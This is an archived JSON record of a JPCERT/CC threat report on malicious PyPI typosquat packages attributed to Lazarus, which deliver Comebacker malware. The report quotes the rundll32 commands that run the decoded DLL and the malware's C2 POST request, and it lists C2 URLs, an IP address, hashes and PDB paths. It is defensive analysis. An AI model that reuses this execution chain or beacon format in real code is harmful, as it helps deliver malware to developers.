{
	"id": "9ab30ebd-164a-43c8-b540-423f2e26f96b",
	"created_at": "2026-04-06T15:53:35.728258Z",
	"updated_at": "2026-04-10T13:11:35.902857Z",
	"deleted_at": null,
	"sha1_hash": "6588c8cb5afa8adcc69f776861f62ddf905ea4a6",
	"title": "New Malicious PyPI Packages used by Lazarus - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2199813,
	"plain_text": "New Malicious PyPI Packages used by Lazarus - JPCERT/CC\r\nEyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2024-02-27 · Archived: 2026-04-06 15:36:48 UTC\r\nJPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI, the official Python\r\npackage repository (Figure 1). The Python packages confirmed this time are as follows:\r\npycryptoenv\r\npycryptoconf\r\nquasarlib\r\nswapmempool\r\nThe package names pycryptoenv and pycryptoconf are similar to pycrypto , which is a Python package used\r\nfor encryption algorithms in Python. Therefore, the attacker probably prepared the malware-containing malicious\r\npackages to target users' typos in installing Python packages.\r\nThis article provides details on these malicious Python packages.\r\nFigure 1: Python packages released by Lazarus attack group\r\nFile structure of the malicious Python packages\r\nSince the multiple malicious Python packages confirmed this time have almost the same file structure, this article\r\nuses pycryptoenv as an example in the following sections. The malicious Python package has the file structure\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 1 of 9\n\nshown in Figure 2. The main body of the malware is a file named test.py . This file itself is not Python but\r\nbinary data, which is an encoded DLL file.\r\nFigure 2: File structure of pycryptoenv\r\nThe code to decode and execute test.py is contained in __init__.py , as shown in Figure 3. The test.py is\r\nsimply an XOR-encoded DLL file, and it is decoded, saved as a file, and then executed by __init__.py .\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 2 of 9\n\nFigure 3: Code to decode and execute test.py\r\nThis type of malware, called Comebacker, is the same type as that used by Lazarus to target security researchers in\r\nan attack reported by Google [1] in January 2021. The following sections describe the details of test.py .\r\nDetails of test.py\r\nSince the code which calls the function to decode and execute test.py (the crypt function in Figure 3) does not\r\nexist in pycryptoenv, the malware cannot be executed simply by installing pycryptoenv. Therefore, the attacker\r\nprobably runs the Python script that executes the crypt function on the target machine in some way. The following\r\nsection describes the behavior when a function that decodes and executes test.py is run.\r\nFigure 4 shows the process from pycryptoenv to the execution of the malware main body.\r\nFigure 4: Flow up to Comebacker execution\r\nAfter test.py is XOR-decoded, it is saved as output.py and then executed as a DLL file by the following\r\ncommand.\r\n$ rundll32 output.py,CalculateSum\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 3 of 9\n\nThe DLL files IconCache.db and NTUSER.DAT are created and executed by the following command.\r\nNTUSER.DAT is encoded, and the decoded data is executed on memory, and this data is the main body of\r\nComebacker.\r\nRUNDLL32.exe %APPDATA%\\..\\Roaming\\Microsoft\\IconCache.db,GetProcFunc %APPDATA%\\..\\Roaming\\Microsoft\\C\r\nThe samples confirmed this time have a fixed decode key as shown in Figure 5, and they are used to decode each\r\nfile.\r\nFigure 5: Decode Keys and Decode Functions\r\nIn addition, the NOP code used in this sample has a unique characteristic. As shown in Figure 6, there is a\r\ncommand starting with 66 66 66 66 in the middle of the code. This is often used, especially in the decode and\r\nencode functions. This characteristic is also found in other types of malware used by Lazarus, including malware\r\nBLINDINGCAN.\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 4 of 9\n\nFigure 6: Comparison of characteristic NOP commands between Comebacker and BLINDINGCAN\r\nDetails of Comebacker\r\nComebacker sends the following HTTP POST request to its C2 servers.\r\nPOST /manage/manage.asp HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .N\r\nHost: chaingrown.com\r\nContent-Length: 129\r\nCache-Control: no-cache\r\nNB=XMAFUUCARD\u0026GPETR=NTU1NTY0aHU0Z2psMkRhUA==\u0026FCKA=\u0026YUYRNT=0\u0026POCAYM=52\u0026PQWFQU=MgAwADIANAAtADAAMgAtADAA\r\nThe POST data consists of the following:\r\n[2 random characters]=[command (determined by string length)]\u0026[random character]=[device ID (base64 e\r\n*After receiving data from the server, it becomes \"yyyy-MM-dd hh:mm:ss|command (same as the first one\r\nIn response to the above data sent, the server sends back a Windows executable file (see Appendix A for details of\r\nthe received data format). Comebacker has a function to execute the received Windows executable file on\r\nmemory.\r\nAssociated Attacks\r\nPhylum has reported [2] a similar case to this attack in the past. In this case, a npm package contains Comebacker,\r\nand thus the attack is considered to have been conducted by Lazarus as well. In this way, the attacker aims to\r\nspread malware infections in multiple package repositories.\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 5 of 9\n\nFigure 7: npm package released by Lazarus attack group\r\nIn Closing\r\nThe malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times\r\n(Figure 8). Attackers may be targeting users’ typos to have the malware downloaded. When you install modules\r\nand other kinds of software in your development environment, please do so carefully to avoid installing unwanted\r\npackages. For C2 and other information on the malware described in this article, please refer to the Appendix.\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 6 of 9\n\nFigure 8: Number of pycryptoenv downloads\r\nShusei Tomonaga\r\n(Translated by Takumi Nakano)\r\nReferences\r\n[1] Google: New campaign targeting security researchers\r\n　 https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/\r\n[2] Phylum: Crypto-Themed npm Packages Found Delivering Stealthy Malware\r\n　 https://blog.phylum.io/crypto-themed-npm-packages-found-delivering-stealthy-malware/\r\nAppendix A: Format of the received data\r\nTable A: Format of the received data\r\nOffset Content Notes\r\n0x00 Hex string Command\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 7 of 9\n\n0x05 Hex string End flag ( reception ends if it is 3)\r\n0x07 Hex string Data length\r\n0x10 Data Base64 data with \"+\" replaced with space\r\nThe data format is as follows:\r\n[number(number to be included in the next POST data)]|[number(data size to receive)]|[Export function\r\nAppendix B: C2\r\nhttps://blockchain-newtech.com/download/download.asp\r\nhttps://fasttet.com/user/agency.asp\r\nhttps://chaingrown.com/manage/manage.asp\r\nhttp://91.206.178.125/upload/upload.asp\r\nAppendix C: Malware hash\r\npycryptoenv-1.0.7.tar.gz\r\n- b4a04b450bb7cae5ea578e79ae9d0f203711c18c3f3a6de9900d2bdfaa4e7f67\r\npycryptoenv-1.0.7-py3-none-any.whl\r\n- c56c94e21913b2df4be293001da84c3bb20badf823ccf5b6a396f5f49df5efff\r\npycryptoconf-1.0.6.tar.gz\r\n- 956d2ed558e3c6e447e3d4424d6b14e81f74b63762238e84069f9a7610aa2531\r\npycryptoconf-1.0.6-py3-none-any.whl\r\n- 6bba8f488c23a0e0f753ac21cd83ddeac5c4d14b70d4426d7cdeebdf813a1094\r\nquasarlib-1.0.8.tar.gz\r\n- 173e6bc33efc7a03da06bf5f8686a89bbed54b6fc8a4263035b7950ed3886179\r\nquasarlib-1.0.8-py3-none-any.whl\r\n- 3ab6e6fc888e4df602eff1c5bc24f3e976215d1e4a58f963834e5b225a3821f5\r\nswapmempool-1.0.8.tar.gz\r\n- 60c080a29f58cf861f5e7c7fc5e5bddc7e63dd1db0badc06729d91f65957e9ce\r\nswapmempool-1.0.8-py3-none-any.whl\r\n- 26437bc68133c2ca09bb56bc011dd1b713f8ee40a2acc2488b102dd037641c6e\r\nComebacker\r\n- 63fb47c3b4693409ebadf8a5179141af5cf45a46d1e98e5f763ca0d7d64fb17c\r\n- e05142f8375070d1ea25ed3a31404ca37b4e1ac88c26832682d8d2f9f4f6d0ae\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 8 of 9\n\nLoader\r\n- 01c5836655c6a4212676c78ec96c0ac6b778a411e61a2da1f545eba8f784e980\r\n- aec915753612bb003330ce7ffc67cfa9d7e3c12310f0ecfd0b7e50abf427989a\r\n- 85c3a2b185f882abd2cc40df5a1a341962bc4616bc78a344768e4de1d5236ab7\r\n- a4e4618b358c92e04fe6b7f94a114870c941be5e323735a2e5cd195138327f8f\r\n- a8a5411f3696b276aee37eee0d9bed99774910a74342bbd638578a315b65e6a6\r\n- 8fb6d8a5013bd3a36c605031e86fd1f6bb7c3fdba722e58ee2f4769a820b86b0\r\nAppendix D: PDB\r\nF:\\workspace\\CBG\\Loader\\npmLoaderDll\\x64\\Release\\npmLoaderDll.pdb\r\nF:\\workspace\\CBG\\npmLoaderDll\\x64\\Release\\npmLoaderDll.pdb\r\nD:\\workspace\\CBG\\Windows\\Loader\\npmLoaderDll\\x64\\Release\\npmLoaderDll.pdb\r\nF:\\workspace\\CBG\\Loader\\publicLoaderFirst\\x64\\Release\\publicLoaderFirst.pdb\r\nSource: https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html"
	],
	"report_names": [
		"lazarus_pypi.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775490815,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6588c8cb5afa8adcc69f776861f62ddf905ea4a6.pdf",
		"text": "https://archive.orkl.eu/6588c8cb5afa8adcc69f776861f62ddf905ea4a6.txt",
		"img": "https://archive.orkl.eu/6588c8cb5afa8adcc69f776861f62ddf905ea4a6.jpg"
	}
}